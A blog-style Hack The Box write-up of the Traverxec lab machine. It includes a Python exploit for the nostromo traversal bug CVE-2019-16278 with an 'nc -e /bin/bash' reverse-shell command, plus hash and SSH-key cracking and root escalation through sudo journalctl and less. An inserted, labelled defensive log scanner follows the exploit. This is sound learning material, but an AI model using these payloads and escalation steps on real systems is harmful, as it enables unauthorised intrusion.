Hello, I am Arsalan, an information systems student. I blog about cyber security, CTF writeups, web development, and more about tech. Born and raised in Indonesia, currently living in Indonesia.


CVE-2019-16278 Hackthebox Traverxec Writeup

This article is a CTF writeup.


Hello, this is my writeup for Traverxec from Hack The Box, an awesome platform to learn hacking.


First, we have to gather more information about this machine, so I use nmap to see which ports are open and what services they run.

This machine is running HTTP (80) and SSH (22), so I open the web page in my browser, and this is the web page:

It looks like a normal static website, so I try accessing /admin, and this is what I got:

As you can see, this website is using the nostromo web server, so I looked up this web server, searched for bugs, and found this CVE here. I created a Python script to exploit the web server; this is my exploit:

from pwn import *

cmd = "nc -e /bin/bash 1337"
payload="""POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1""".format(cmd)

r = remote("",80)

Before running the script, I listen on port 1337 on my machine

and run the exploit.

After running the exploit, check the listening terminal again, and we have our shell.
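From the defender's side, the request in the script above stands out in a web server access log because the `..` segments only appear after `%0d` is decoded and the control character is dropped. The following is an added example, not part of the original writeup: it assumes Common Log Format entries, the names `classify` and `scan` are hypothetical, and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumed log layout: Common Log Format with the request line in double quotes.
LOG_RE = re.compile(r'^(?P<client>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
CONTROL = bytes(range(0x20)) + b"\x7f"  # CR, LF, NUL, tab, DEL, ...

def decode_path(target):
    """Percent-decode the path part until it stops changing (at most 3 rounds)."""
    path = target.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(3):
        decoded = unquote_to_bytes(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(target):
    """Return 'clean', 'traversal' or 'obfuscated-traversal' for a request target."""
    decoded = decode_path(target)
    if b".." in decoded.split(b"/"):
        return "traversal"
    # '..' that only appears once control bytes are dropped, as with /.%0d./
    if b".." in decoded.translate(None, CONTROL).split(b"/"):
        return "obfuscated-traversal"
    return "clean"

def scan(lines):
    """Return (line_number, client, target, verdict) for every flagged request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LOG_RE.match(line)
        verdict = classify(match["target"]) if match else "clean"
        if verdict != "clean":
            hits.append((number, match["client"], match["target"], verdict))
    return hits

# Constructed sample log lines (documentation addresses, not from the original post).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2020:10:00:05 +0000] "GET /admin HTTP/1.1" 404 0',
    '192.0.2.10 - - [01/Jan/2020:10:00:09 +0000] "GET /~david/ HTTP/1.1" 200 512',
    '192.0.2.66 - - [01/Jan/2020:10:01:00 +0000] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0" 200 0',
    '192.0.2.77 - - [01/Jan/2020:10:02:00 +0000] "GET /img/../../etc/passwd HTTP/1.1" 400 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The same normalisation (decode, drop control bytes, then check for `..` segments) can also sit in a reverse proxy or WAF rule in front of the web server, so the request is rejected before it reaches it.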

Now let's look at the nostromo web server directory at /var/nostromo, where I found several directories:


The most interesting one is the conf folder, so I checked the conf directory and found two files:


nhttpd? Hmm, okay, it looks interesting, so let's open it:


servername		traverxec.htb
serverlisten		*
serveradmin		david@traverxec.htb
serverroot		/var/nostromo
servermimes		conf/mimes
docroot			/var/nostromo/htdocs
docindex		index.html


logpid			logs/nhttpd.pid


user			www-data


htaccess		.htaccess
htpasswd		/var/nostromo/conf/.htpasswd


/icons			/var/nostromo/icons


homedirs		/home
homedirs_public		public_www

Cracking htpasswd

There is an htpasswd file inside /var/nostromo/conf/ and some homedirs configuration. Let's see what is inside htpasswd:


The password is stored as a hash, so I check the hash using hashid.

Well, okay, let's use hashcat to crack it. After reading the example hashes in the hashcat documentation here, I got the information about the hash-mode: it's 500. So let's crack it using the rockyou wordlist; you can download the wordlist here.

Okay, good, we got the password. But this is not the SSH password. After enumerating and reading the manual here, I found something about homedirs:

To serve the home directories of your users via HTTP, enable the homedirs option by
defining the path in where the home directories are stored, normally /home. To access
a users home directory enter a ~ in the URL followed by the home directory name like
in this example:


Well, let's try to open it on the machine.

Another web page? Okay. After enumerating more, I ended up trying to access /home/david via CVE-2019-16278 and got nothing, but then I remembered our homedirs. There is a configuration like this:

homedirs		/home
homedirs_public		public_www

So I assume public_www must exist inside /home/david/, and when I try to access /home/david/public_www I get something:

A directory called protected-file-area, and it contains a file:


Okay, let's download the file via the browser by accessing the link.

I got a prompt like this:

So let's use david as our username and Nowonly4me as our password, and we are in.

Crack RSA Private Key

Crack Rsa Private Key

After downloading the file, I got a .ssh directory and some files:


Now we have a private key, right? So let's crack the private key to get the passphrase. I use ssh2john and write its output to a file (you can download ssh2john here), and now let's crack it.

Nice, we got the passphrase. Now let's try to log in via SSH as david.

Rooting Machine

After logging in, I found something inside /home/david/bin:


And this is server-stats.sh:


cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

And this is what I got when I ran the script:

It looks like journalctl is running as root, so it is possible for us to escalate via journalctl.

Privilege Escalation

After reading here, I found that journalctl uses less as its default pager, so if our terminal is too small to show the whole output, it will pipe to less. First I copied the last line of server-stats.sh and removed the pipe, like this:

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

And ran it.